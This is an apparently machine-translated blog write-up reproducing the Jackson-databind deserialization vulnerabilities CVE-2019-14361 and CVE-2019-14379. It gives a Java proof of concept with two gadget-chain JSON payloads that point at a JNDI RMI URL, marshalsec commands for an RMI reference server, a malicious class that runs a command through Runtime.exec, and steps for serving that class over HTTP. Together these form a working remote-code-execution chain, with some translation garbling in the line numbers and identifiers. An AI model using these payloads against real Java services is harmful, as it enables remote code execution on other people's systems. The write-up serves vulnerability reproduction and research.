CVE-2019-14361 CVE-2019-14379漏洞复现

I received a push on the evening of July 30. I learned that Jackson-databind has released a new RCE, and some bigwigs have found a new way to use it.

漏洞分析

According to the issue of Jackson developer, triggering this Jackson vulnerability requires the following requirements.

The target application receives JSON data sent by an untrusted client

The target application uses polymorphic type processing method to handle properties of the java.lang.Object type;

In this vulnerability, there are a lot of third-party jar packages that depend on (I feel that it is quite a coincidence that I can encounter these libraries during the actual utilization process)

环境搭建

The third-party libraries used in this article are:

jackson-annotations-2.9.8

jackson-core-2.9.8

jackson-databind-2.9.8

ehcache-2.9.1

slf4j-api-1.7.7

logback-core-1.3.0-alpha4

slf4j-simple-1.7.21

javax.transaction_1.0.0.0_1-1

Download it at http://www.mvnrepository.com.

漏洞代码

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

twenty one

twenty two

twenty three

twenty four

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

import com.fasterxml.jackson.databind.ObjectMapper;

import com.fasterxml.jackson.databind.SerializationFeature;

import java.lang.Exception;

public class Main {

public static void main(String[] args) {

System.out.println('Mapping');

//Note that there are restrictions on higher versions of JDK, and the value of com.sun.jndi.rmi.object.trustURLCodebase needs to be set to true, and the default is false

System.setProperty('com.sun.jndi.rmi.object.trustURLCodebase', 'true');

//CVE-2019-14361 payload

String jsonStr1='[\'ch.qos.logback.core.db.JNDIConnectionSource\', {\'jndiLocation\':\'rmi://127.0.0.1:1099/ExportObject\'}]';

//CVE-2019-14379 payload

String jsonStr2='[\'net.sf.ehcache.transaction.manager.DefaultTransactionManagerLookup\',{\'properties\':{\'jndiName\':\'rmi://127.0.0.1:1099/ExportObject\'}}]';

ObjectMapper mapper=new ObjectMapper();

mappper.enableDefaultTyping();

mapper.configure(SerializationFeature.FAIL_ON_EMPTY_BEANS, false);

System.out.println('Serializing');

Object obj=null;

try {

//!-Replace payload here-!

obj=mapper.readValue(jsonStr1, java.lang.Object.class);

} catch(Exception e) {

e.printStackTrace();

}

System.out.println('objectified');

try {

mappper.writeValueAsString(obj);

} catch(Exception e) {

e.printStackTrace();

}

try {

System.out.println('stringified: ' + mapper.writeValueAsString(obj));

} catch(Exception e)

{

e.printStackTrace();

}

}

}

构建步骤

This article generates a project on IDEA

Create a new java Commandline project

Copy the above code into the Main function

Click the icon in the red box to enter the project structure settings

Import the downloaded external library into the project

For specific import steps, please refer to my article. I won’t go into details here. https://www.secquan.org/BugWarning/1069944

攻击流程

Turn on RMI service

For convenience, we can use the marshalsec artifact, which can quickly enable RMI and LDAP services. Of course you need to download the source code package and compile it with maven. Download link: https://github.com/mbechler/marshalsec. After downloading it locally, you can compile it with mvn clean package -DskipTests. The compilation results are as follows:

Turn on RMI service:

1

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://ip:8000/#ExportObject

Note: # Fill in the class name of your malicious class later, it will automatically bind the URI, and the default port number of rmi is 1099.

Compile ExportObject.java

The ExportObject.java code content is as follows:

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

twenty one

twenty two

twenty three

twenty four

25

package com.by.rmi;

import java.io.BufferedReader;

import java.io.InputStreamReader;

public class ExportObject {

public ExportObject() throws Exception {

Process proc=Runtime.getRuntime().exec('open /Applications/Calculator.app');

BufferedReader br=new BufferedReader(new InputStreamReader(proc.getInputStream()));

StringBuffer sb=new StringBuffer();

String line;

while((line=br.readLine()) !=null) {

sb.append(line).append('\n');

}

String result=sb.toString();

Exception e=new Exception(result);

throw e;

}

public static void main(String[] args) throws Exception {

ExportObject e=new ExportObject();

}

}

Note: The function of the above code is to pop up the calculator on the mac platform. If you change the platform, please replace the content in the exec function yourself.

Compile into class file:

javac ExportObject.java

Execute python2 -m SimpleHTTPServer 8000 under the Generate ExportObject.class folder and start the HTTP service locally.

CVE-2019-14361 测试

Replace the payload in POC with jsonStr1 and compile and run, and the result is as follows:

CVE-2019-14379 测试

Replace the payload in POC with jsonStr2 and compile and run, and the result is as follows:

Correspondingly, the screenshot of the operation of the rmi service is as follows: